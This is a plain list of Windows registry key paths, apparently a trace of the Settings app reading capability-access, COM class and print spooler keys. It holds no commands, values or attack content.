HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\internetClient\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\internetClient\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\internetClientServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\internetClientServer\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\internetClientServer\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\internetClientServer\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\kinectAudio
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\kinectAudio\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\kinectAudio\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\kinectAudio\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\kinectVision\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\kinectVision\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\location
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\location\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\locationHistory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\locationHistory\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\locationHistory\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\locationHistory\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\lowLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\lowLevel\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\lowLevel\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\microphone
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\microphone\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\microphone\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\microphone\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\optical
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\optical\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\optical\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\optical\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\packageManagement
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\packageManagement\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\phoneCall
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\phoneCall\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\phoneCall\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\phoneCall\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\phoneCallHistory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\phoneCallHistory\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\phoneCallHistory\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\phoneCallHistory\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\phoneCallHistoryPublic
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\phoneCallHistoryPublic\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\phoneCallHistoryPublic\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\phoneCallHistoryPublic\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\phoneCallHistorySystem
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\phoneCallHistorySystem\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\phoneCallHistorySystem\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\phoneCallHistorySystem\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\phoneCallSystem
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\phoneCallSystem\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\phoneCallSystem\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\phoneCallSystem\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\picturesLibrary
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\picturesLibrary\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\pointOfService
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\pointOfService\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\pointOfService\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\preemptiveCamera
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\preemptiveCamera\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\preemptiveCamera\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\preemptiveCamera\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\privateNetworkClientServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\privateNetworkClientServer\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\privateNetworkClientServer\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\privateNetworkClientServer\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\proximity
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\proximity\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\proximity\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\proximity\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\radios
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\radios\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\radios\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\radios\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\sensors.custom
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\sensors.custom\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\sensors.custom\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\sensors.custom\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\serialCommunication
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\serialCommunication\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\serialCommunication\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\serialCommunication\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\sms
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\sms\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\sms\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\sms\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\smsSend
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\smsSend\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\smsSend\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\smsSend\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\usb
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\usb\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\usb\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\usb\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\userAccountInformation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\userAccountInformation\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\userAccountInformation\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\userAccountInformation\Apps\Windows.ImmersiveControlPanel_cw5n1h2txyewy\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\userAccountInformation\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\userDataTasks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\userDataTasks\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\userDataTasks\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\userDataTasks\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\userDataTasksSystem
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\userDataTasksSystem\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\userDataTasksSystem\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\userDataTasksSystem\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\userNotificationListener
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\userNotificationListener\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\userNotificationListener\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\userNotificationListener\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\videosLibrary
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\videosLibrary\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\videosLibrary\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\videosLibrary\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\webcam
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\webcam\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\webcam\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\webcam\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\wiFiControl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\wiFiControl\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\wiFiControl\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\wiFiControl\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\wifiData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\wifiData\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\wifiData\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\wifiData\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\wiFiDirect
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\wiFiDirect\Edition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\wiFiDirect\Apps\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\Capabilities\wiFiDirect\AppLaunchAccessCheckRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SecurityManager\AdminCapabilities\cellularData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SecurityManager\AdminCapabilities\backgroundMediaPlayback
HKEY_CURRENT_USER\Software\Classes\CLSID\{EAD1A538-3BB4-45D9-B6C9-DC167E21D959}
HKEY_CURRENT_USER\Software\Classes\CLSID\{ead1a538-3bb4-45d9-b6c9-dc167e21d959}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ead1a538-3bb4-45d9-b6c9-dc167e21d959}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ead1a538-3bb4-45d9-b6c9-dc167e21d959}\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Classes\CLSID\{ead1a538-3bb4-45d9-b6c9-dc167e21d959}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ead1a538-3bb4-45d9-b6c9-dc167e21d959}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ead1a538-3bb4-45d9-b6c9-dc167e21d959}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ead1a538-3bb4-45d9-b6c9-dc167e21d959}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ead1a538-3bb4-45d9-b6c9-dc167e21d959}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ead1a538-3bb4-45d9-b6c9-dc167e21d959}\InProcServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\CLSID\{ead1a538-3bb4-45d9-b6c9-dc167e21d959}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ead1a538-3bb4-45d9-b6c9-dc167e21d959}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{ead1a538-3bb4-45d9-b6c9-dc167e21d959}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ead1a538-3bb4-45d9-b6c9-dc167e21d959}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ead1a538-3bb4-45d9-b6c9-dc167e21d959}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ead1a538-3bb4-45d9-b6c9-dc167e21d959}\AppID
HKEY_CURRENT_USER\Software\Classes\CLSID\{ead1a538-3bb4-45d9-b6c9-dc167e21d959}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ead1a538-3bb4-45d9-b6c9-dc167e21d959}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ead1a538-3bb4-45d9-b6c9-dc167e21d959}\Elevation
HKEY_CURRENT_USER\Software\Classes\Interface\{0F4521BE-A0B8-4116-B3B1-BFECEBAEEBE6}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0F4521BE-A0B8-4116-B3B1-BFECEBAEEBE6}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0F4521BE-A0B8-4116-B3B1-BFECEBAEEBE6}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{D22F448D-39DC-415F-8325-91EDDF0D5264}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D22F448D-39DC-415F-8325-91EDDF0D5264}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D22F448D-39DC-415F-8325-91EDDF0D5264}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}
HKEY_CURRENT_USER\Software\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InProcServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\AppID
HKEY_CURRENT_USER\Software\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SecurityManager\AdminCapabilities\wifiData
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\jvaqbjf.vzzrefvirpbagebycnary_pj5a1u2gklrjl!zvpebfbsg.jvaqbjf.vzzrefvirpbagebycnary
HKEY_CURRENT_USER\Software\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InprocHandler
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\SplWOW64TimeOutSeconds
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\SplWOW64TimeOut
HKEY_LOCAL_MACHINE\Software\Microsoft\COM3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\Com+Enabled
HKEY_CURRENT_USER\Software\Classes\CLSID\{E7B3C0E0-FB47-49F6-A66B-8A7C2E4E7B9C}
HKEY_CURRENT_USER\Software\Classes\CLSID\{E7B3C0E0-FB47-49F6-A66B-8A7C2E4E7B9C}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E7B3C0E0-FB47-49F6-A66B-8A7C2E4E7B9C}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E7B3C0E0-FB47-49F6-A66B-8A7C2E4E7B9C}\ActivateOnHostFlags
